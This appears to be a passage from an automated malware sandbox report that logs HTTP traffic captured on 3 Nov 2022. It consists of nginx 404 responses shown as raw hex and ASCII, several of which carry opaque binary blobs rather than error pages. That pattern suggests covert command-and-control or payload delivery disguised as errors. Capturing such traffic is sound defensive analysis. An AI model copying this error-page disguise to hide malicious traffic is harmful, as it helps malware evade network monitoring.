ad c4 a3 26 8a 4b 66 21 d8 e8 f5 cb c5 74 47 a9 b2 e7 8c 03 31 86 6a da 0d d8 d6 c4 39 45 06 a7 92 40 bc b7 0c ee a1 e3 2d e7 7f ff 08 9e 1a e4 a2 39 f6 af eb 37 f9 22 7e d2 9a 52 2e a6 c0 ce 7d 15 3c f7 86 de a3 9b c7 d1 a6 f5 37 e4 1d 47 e4 a8 f1 e3 34 b5 9d 6b e1 c6 0f 1e c2 d1 4c 69 46 31 be 52 37 2a 13 f1 90 bb 5e 00 af bd cf d3 34 dc cd 26 20 32 30 1e 71 18 15 45 d5 f8 9e 0c 94 79 ea b4 f4 f6 da 66 24 c8 7b 72 72 58 6f 47 16 74 8a bd ad 34 13 13 7d 27 a1 79 5d b2 03 f1 af 97 4a cd 31 e2 5d d4 33 e6 16 91 9e fa ae ac e7 2e be bd 94 e8 0e d8 7b bc f4 e5 63 8c d4 89 47 d2 c8 81 4f 81 4f f3 55 43 56 9b 62 c8 4b 42 b3 0a f7 40 ec 9a 8a a3 0e c2 c8 6e 35 97 c7 a8 aa 86 3a 19 e2 ca 43 2a be 48 8a 79 b3 54 95 5f 47 5b d7 47 fd f7 5f 41 16 04 f0 67 35 8b 47 47 b8 26 83 63 1f 06 56 97 9b c9 11 b7 a7 b0 81 21 59 20 1a 5b 8c 1e f9 c3 97 29 59 20 d5 16 8d 88 d8 24 27 06 7e 2a d4 49 96 b7 95 e2 c7 c4 c3 58 e2 79 dd 83 78 0c 00 9c 2f 73 9d 0b d2 68 ac 80 b9 86 58 9d 23 ee 62 21 30 26 25 55 64 97 c5 7b eb cd 77 50 c6 e1 2a f7 16 b2 49 be eb 08 2c 4d df 0d 9d 94 48 cd d5 13 52 e2 13 de 06 be 34 4a 31 36 e1 74 20 08 70 90 ea 7c e9 e1 1d 2f 2a 8b 1f 19 42 a3 08 15 70 4c 61 08 2e 7b 12 13 a7 41 aa e9 c0 c7 f5 b5 aa f6 4d b0 da 53 ef cf 14 a9 19 2b af ac 9e 8e e3 1f 9f 16 ed 55 0a ec 50 18 fe 1d f5 0b 62 61 32 1d 3f 6d 5b 9c ee e0 0e 6a ee b5 4b bc 61 41 bf be 55 b1 b6 0a bb c0 04 c0 77 9c 80 79 af 15 22 6b a8 d0 63 fb a5 ae c0 41 33 36 88 c7 03 e6 ca 58 70 9e d0 a4 9f 65 34 bf ff 2c 83 19 72 4c 35 f7 61 ce
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 66 61 30 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 f5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 96 32 68 54 8f ad 7e 3d 23 fd 85 f1 ff 6e 59 32 64 fc eb 13 35 50 b4 3b f7 48 70 b0 d0 9e 5f f2 c6 93 9c 84 0a b6 3b 85 a3 87 a9 fd 5c 9c 3d 3f 01 8b d4 be 6e cf 51 e9 3d 7c 8c 1c de 17 b7 82 06 a7 ab 67 c5 5f 21 94 73 6a a9 9a f5 fc 75 11 bf 6c 13 d9 1e 8b 34 8b 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 73 fb 42 15 9b 06 57 53 a9 06 0e ff 1d 09 52 2b e5 8d 83 7b 9e 45 f5 fe 73 8c 5c db c4 19 12 13 bf f8 62 90 24 08 4f c5 d3 e3 cb a1 61 6e de f5 69 89 18 17 7e 5f ef 9a a5 54 c9 a0 c1 bb dd 7a 08 90 4e 19 e0 2c 95 a9 1d 1a f5 96 be 25 51 61 9a e4 bb 7e 88 2c c8 48 61 26 c6 4a 98 03 fd 6c 9e aa 6b ac 87 3f bd 61 0d c0 4d bf 46 24 fd f8 12 6c 33 6c 39 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 67 99 f4 1a 54 9b 4a d8 19 fe 48 4d e3 11 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 b2 b5 8a 33 85 98 90 f7 2f e4 ec e7 6e 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 33 c9 cc 46 d9 48 15 ac 9f c3 d9 55 7d af ba 68 92 0e ff 9d 7f 7f 55 40 57 74 7b 39 c6 e6 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b af 1f ba f6 f6 01 e8 e4 c1 4c a0 90 4e b1 54 55 a5 9a b6 1b 6f c7 cb 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee e3 ce 57 c3 62 79 e4 6b b5 5c 68 91 00 38 85 f3 2c 6e af 03 5b 85 1b e4 a6 65 11 9f 10 b9 d9 b0 99 07 99 8a cd e4 7f 74 39 50 6d 83 e2 cb f8 f9 82 62 7a d7 44 e0 c3 e0 2b f9 30 b9 01 10 17 28 d2 d6 43 1f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 40 80 e3 5c e7 52 90 3e 27 a7 3a 96 29 a3 e7 17 3f 1c 61 7c 4d cc 70 d4 03 09 a9 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 75 98 c3 e5 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 37 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 be 60 3a 4c cd 44 9f 05 85 a2 4e f2 7a a6 64 12 09 78 e3 28 01 7c 89 0d 0a 30 0d 0a 0d 0a Data Ascii: 27Uys/~(`:LDNzdx(|0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 33 38 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 86 19 d8 5a d5 e4 0f b6 39 bf 29 4a 54 78 e5 76 08 6b 8d 5c 66 28 71 c3 a2 89 b9 e6 21 d0 73 3a 16 35 ff b7 0d 0a 30 0d 0a 0d 0a Data Ascii: 38Uys/~(u:RZ9)JTxvk\f(q!s:50
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 66 61 30 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 c5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 c1 56 26 40 d8 c9 30 29 74 99 cb e5 a8 0a 17 26 33 98 b4 07 5c 34 fa 2f a0 2c 28 a4 10 fa 11 e6 a8 63 2a 90 25 d2 75 91 d3 25 9d e9 9e f8 73 2b 48 bd 1f aa 74 ab 1f fd 6a 18 dc 08 89 73 f9 96 51 c3 e0 73 92 3b 6f 80 36 f8 37 33 a3 98 3b 05 ed 05 70 b1 17 22 58 4a 63 0a 62 3e 59 20 08 5a f7 fd 3c 5b 56 3f cb 00 23 be 42 15 37 07 50 52 f1 ca 16 9e 1d ef 53 2b e5 a9 94 7b 7e 45 f7 ff 8e 19 55 db c4 1d 13 13 bf 1e e3 92 24 08 0f c5 03 b1 cb a1 61 7c de f5 6c b9 19 17 7e 5f af 9a a0 44 c9 a0 c1 b9 dd 7a 0d 80 57 19 e0 28 95 a9 ad 5c f1 96 bc 25 51 e1 9a d4 2e 7c 88 38 c8 48 6b a1 d0 4a 9a 13 fd ec 9e aa 7b ac 97 2f bd 61 0d c0 5d bf 46 34 fd f8 f6 8b 32 6c 79 7c 0a 8d c7 3d fc 0e b4 a8 7e 71 eb 80 f5 1a 68 9b 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 d7 29 2a b9 6e ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 e7 72 3c 27 94 69 b7 9f 33 c9 cc 46 d9 48 15 ac af fb d9 55 1d ad ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b aa 93 58 1e 85 8a 64 b1 57 d4 13 51 8c 60 17 4b 81 8d de 8e 82 05 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 4f c3 cb 49 1c 4c 86 2f 7f 54 ab 1e 62 cc 07 ee c3 ce 55 a3 4c 3d 84 1f d4 b6 69 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 e6 7d 10 5f 3e cb aa c2 fa 07 99 8a dd a7 7f 74 79 90 75 43 cc fd 8b 8b e1 68 79 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 5f d0 a1 aa 7a 8f f6 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca 82 cf 25 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 c3 e8 c8 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 66 66 61 30 0d 0a 02 00 b4 60 3b d4 0f 1a 40 10 16 30 8f b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 53 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 1d 8f e2 e3 b3 98 30 06 81 8f f1 83 0e 25 a6 79 5e 5c 51 fb 32 35 47 48 3b fe cc bd 6c 62 ad 5d 6f 38 6d 57 12 73 36 18 28 a6 70 a3 d1 43 36 2f a4 14 0f 85 c2 e7 27 c2 25 7b ba 49 79 b9 53 68 47 8f 2a f5 db fa 6a c6 86 04 12 fc 2a 54 e9 30 f6 c7 35 f3 73 07 03 d2 1f f9 d8 fa e0 b3 89 71 cd 37 33 33 d1 68 73 45 7c 1f 57 44 8d e8 be 3c 50 35 51 fe 08 22 b9 7f 18 66 3d 28 2a 87 6a dd d6 be db 43 11 5c 53 a6 cd f6 4d 55 64 91 54 5b fd 55 19 d0 ed 05 70 b1 17 22 58 4a 33 4f 62 3e 15 21 0b 5a a3 06 93 3a 56 3f cb 00 23 be 42 15 d7 07 53 53 fa cb 1f 9e 1d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 28 c8 55 db 88 0c 15 13 e4 51 a2 d1 24 08 4f c5 03 a1 cb a1 81 7e 50 54 62 b8 1b 0e 7e 17 a4 9a a5 68 d1 a0 c1 b9 dd 7a 35 c4 45 19 e0 3c 95 a9 18 7a fe 96 be 25 11 61 9a c4 3e 7c 88 2a c8 48 6f a1 c0 4a 9a 03 fd ec 9a aa 7b ac 87 2f bd 61 0d 00 7e bf 46 30 fd f8 1a d6 10 6c 2b 7c 0b 8d c7 fd e4 0e a4 eb 7e 71 eb 80 e5 1a 68 8b 4a d8 19 ae cc 4f 2b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 fb 21 b9 80 ca cc 23 b2 95 02 31 79 72 86 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af c1 37 27 a4 8e b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 71 67 a3 1e 1e 54 ab 1e ce 3a 1a ee c3 de 57 a3 4c 55 8e 1f d4 58 68 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 86 7d 10 ff 54 f8 8d f1 99 07 99 8a 69 d9 7f 74 79 30 66 43 cc 87 8b 8b e1 2e 71 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 92 ae 46 df 92 f2 f9 7a 8f f6 6b e3 fc c2 d9 37 00 20 e8 1c c9 20 f5 52 48 4e 31 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 58 58 07 6b ab f6 ae 25 2e 6d b2 ce ec 35 58 c8 a7 0d 8e ca d4 5f a3 48 43 9c 55 03 62 18 3a 1d f8 40 aa ae 88 81 c4 a1 f3 0b 0f bf c5 ac 8b c8 2f bb 05 09 e8 8b d3 15 ac 18 50 77 b3 0e 23 8a 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 53 e8 b8 1c 6b 93 83 01 ee 43 d9 ed 07 52 44 dc 1a 7e 87 18 57 c1 17 7d 42 9b 8d 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 33 0f b6 35 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 03 Nov 2022 11:46:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 